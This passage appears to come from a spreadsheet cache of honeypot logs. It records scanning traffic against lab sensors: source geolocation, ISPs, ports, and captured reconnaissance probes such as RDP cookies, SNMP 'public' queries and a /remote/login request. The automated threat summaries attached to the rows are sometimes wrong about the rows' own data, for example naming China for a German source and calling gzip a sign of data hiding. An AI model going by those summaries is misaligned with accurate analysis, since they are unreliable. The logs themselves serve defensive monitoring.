(198.235.24.232,63444)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FVglka'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:18e8"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Attempt to establish encrypted connection for authentication. Malicious actor likely attempting to exploit secure FTP login. Trying to authenticate via TLS encryption. &amp;&amp; Possible malicious activity: A client is attempting to use TLS encryption with an FTP server, which could be a phishing attempt or a way to evade detection. This suggests the attacker is trying to encrypt their communication for anonymity. The client is likely using this method to gain unauthorized access. &amp;&amp; The attacker is attempting to establish an encrypted connection using SSL, likely for malicious purposes such as unauthorized access or data theft. This suggests a possible attempt to bypass security measures by encrypting the communication. The attacker is trying to authenticate with the server. &amp;&amp; The attacker is attempting to establish an encrypted connection for FTP authentication, which may be a precursor to unauthorized file transfer or login attempts. This suggests potential malicious intent related to accessing or exploiting FTP service vulnerabilities. The use of SSL encryption may indicate an attempt to evade detection or monitoring. &amp;&amp; The system has detected an attempt to access IMAP services, indicating potential unauthorized access or scanning activity. The absence of data suggests that no login credentials were provided or the connection was not successful. This could be a reconnaissance phase by an attacker. &amp;&amp; This suggests a connection attempt to an IMAP service, specifically a CAPABILITY command which is typically used by clients to negotiate supported features with the server. This could be part of a reconnaissance or scanning activity. The lack of response from the server indicates no valid interaction was established. &amp;&amp; Unknown Redis service activity, possibly an attempt to access or interact with it without permission._x000a_This could be related to unauthorized data retrieval or manipulation of cached data._x000a_May indicate malicious intent to exploit or disrupt service functionality. &amp;&amp; This log indicates that there was an attempt to access a service but the SNMP protocol failed or is unavailable for this specific event. The lack of SNMP data suggests a potential issue with network communication or configuration for this particular interaction. &amp;&amp; Unauthorized access to a device's settings or configuration, potentially allowing malicious activity. The &quot;public&quot; community string suggests unsecured access. This could be a sign of reconnaissance."/>
    <s v="SSL Attack &amp;&amp; Tls Auth &amp;&amp; SSL Attack &amp;&amp; SSLS Attack &amp;&amp; Unknown Login &amp;&amp; SNMP Attack"/>
  </r>
  <r>
    <x v="18"/>
    <x v="18"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:04:47"/>
    <d v="2025-03-10T19:18:13"/>
    <d v="2025-04-30T23:04:47"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:f6f5"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="19"/>
    <x v="19"/>
    <s v="positive.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:01:58"/>
    <d v="2024-04-02T11:04:00"/>
    <d v="2025-04-30T23:01:58"/>
    <n v="330"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_MYSQL_H3&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_MYSQL_H24&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_REDIS_H20&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;1080&amp;&amp;1433&amp;&amp;39369&amp;&amp;6667&amp;&amp;389&amp;&amp;1521&amp;&amp;9100&amp;&amp;5432&amp;&amp;110&amp;&amp;3306&amp;&amp;NA&amp;&amp;445&amp;&amp;443&amp;&amp;80&amp;&amp;25&amp;&amp;21&amp;&amp;3389&amp;&amp;23&amp;&amp;143"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="2005-08-31"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;query&amp;&amp;NA&amp;&amp;command&amp;&amp;stshash&amp;&amp;request&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IRC:{'command': 'FOX.VERSION=S:1.0', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IRC:{'command': 'ID=I:1', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IRC:{'command': '};;', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57ec:b0ab"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and exploit various services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and IRC. The attacker is using a variety of tools and techniques to attempt to gain unauthorized access, steal sensitive information, or disrupt service. &amp;&amp; Attempted login to IMAP service failed, possibly due to incorrect credentials or no activity at all. No valid commands were executed on this service. This may indicate a scanning activity or an attempt to exploit the service. &amp;&amp; The data indicates that an unknown entity is probing the IMAP service to discover available capabilities, possibly a reconnaissance step for further malicious activity. The CAPABILITY command is typically used by clients to request a list of supported features from the server. This behavior can be indicative of a potential scanning or vulnerability assessment attempt."/>
    <s v="Some specific findings include: &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="20"/>
    <x v="20"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:56:03"/>
    <d v="2025-04-26T19:01:18"/>
    <d v="2025-04-30T22:56:03"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abe0:468b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No suspicious activity detected as TELNET service is inactive. Normal operation of service without incoming connections. No malicious attempts were made to access this service. &amp;&amp; No TELNET activity detected, indicating potential evasion or lack of interest in this service. This could suggest that attackers are focusing on other services offered by the monitored system. Alternatively, it might indicate a misconfigured or inactive TELNET service."/>
    <s v="Portscan &amp;&amp; Portscan"/>
  </r>
  <r>
    <x v="21"/>
    <x v="21"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:55:15"/>
    <d v="2025-04-25T17:04:25"/>
    <d v="2025-04-30T22:55:15"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SOCKS5_H6"/>
    <s v="5900&amp;&amp;1080&amp;&amp;389"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abe2:12e1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No VNC connection attempts were recorded, indicating the system remains undetected by potential attackers._x000a_This lack of activity may suggest that attackers are avoiding this service or have already compromised other means to access the system. &amp;&amp; No VNC connections were recorded, which could indicate that attackers did not attempt to access this service or they failed to establish a connection successfully. This lack of activity may suggest that this service is not currently being targeted by malicious actors. The absence of any log data for VNC does not necessarily mean the service is secure but rather that it was not accessed during this timeframe."/>
    <s v="VNC Scanning &amp;&amp; VNC Brute"/>
  </r>
  <r>
    <x v="22"/>
    <x v="22"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:54:34"/>
    <d v="2025-04-30T22:33:11"/>
    <d v="2025-04-30T22:54:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main (Innenstadt I)"/>
    <s v="2925533"/>
    <s v="60326"/>
    <s v="50.1013"/>
    <s v="8.62643"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe Infra"/>
    <s v="hosting"/>
    <s v="M247 Ltd Frankfurt"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'WanScannerBot/1.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9246:6bc4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A GET request was made to the device, likely a server, on port 8443 from an IP address in China, indicating potential scanning activity. The User-Agent string is &quot;WanScannerBot&quot;, which may indicate automated probing or vulnerability scanning software. This could be a reconnaissance attempt before launching further attacks. &amp;&amp; An unknown bot, WanScannerBot, is making a GET request to the root of a server on a specific IP address, likely scanning for vulnerabilities or gathering information. This could be a reconnaissance activity by an attacker to identify potential targets. The request includes gzip compression, which may indicate attempted data hiding or encryption."/>
    <s v="Port Scan &amp;&amp; Scanning Bot"/>
  </r>
  <r>
    <x v="23"/>
    <x v="23"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:52:56"/>
    <d v="2025-02-07T13:23:35"/>
    <d v="2025-04-30T22:52:56"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_SOCKS5_H4"/>
    <s v="5432&amp;&amp;1080&amp;&amp;443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BY"/>
    <s v="Bavaria"/>
    <s v="Lower Bavaria"/>
    <s v="Hauzenberg (Germannsdorf)"/>
    <s v="2908661"/>
    <s v="94051"/>
    <s v="48.6242"/>
    <s v="13.6687"/>
    <s v="51396"/>
    <s v="Pfcloud UG"/>
    <s v="Pfcloud UG"/>
    <s v="hosting"/>
    <s v="Pfcloud UG"/>
    <s v="2019-07-31"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTPS:{'Host': 'https://194.233.76.135/', 'method': 'GET', 'uri': '/remote/login?lang=en'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d87:c142"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="24"/>
    <x v="24"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:49:19"/>
    <d v="2025-04-30T22:49:19"/>
    <d v="2025-04-30T22:49:19"/>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3:c5fb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="25"/>
    <x v="25"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:48:36"/>
    <d v="2025-04-30T22:48:36"/>
    <d v="2025-04-30T22:48:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="NA"/>
    <s v="21.1959"/>
    <s v="72.8302"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:8b8b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="26"/>
    <x v="26"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:41:06"/>
    <d v="2023-07-25T12:15:28"/>
    <d v="2025-04-30T22:41:06"/>
    <n v="1348"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_NTP_H15&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_ORACLE_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;1433&amp;&amp;21&amp;&amp;5432&amp;&amp;3306&amp;&amp;1080&amp;&amp;64744&amp;&amp;6379&amp;&amp;NA&amp;&amp;3389&amp;&amp;5900&amp;&amp;161&amp;&amp;1521&amp;&amp;9100&amp;&amp;445&amp;&amp;143&amp;&amp;389&amp;&amp;110&amp;&amp;52905&amp;&amp;6667"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="query&amp;&amp;connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;NA&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qhdXmQYgf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SHOGAn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uZUdCR'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,59462)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,59478)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,59486)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GpJdksXpb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SiwgjD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: 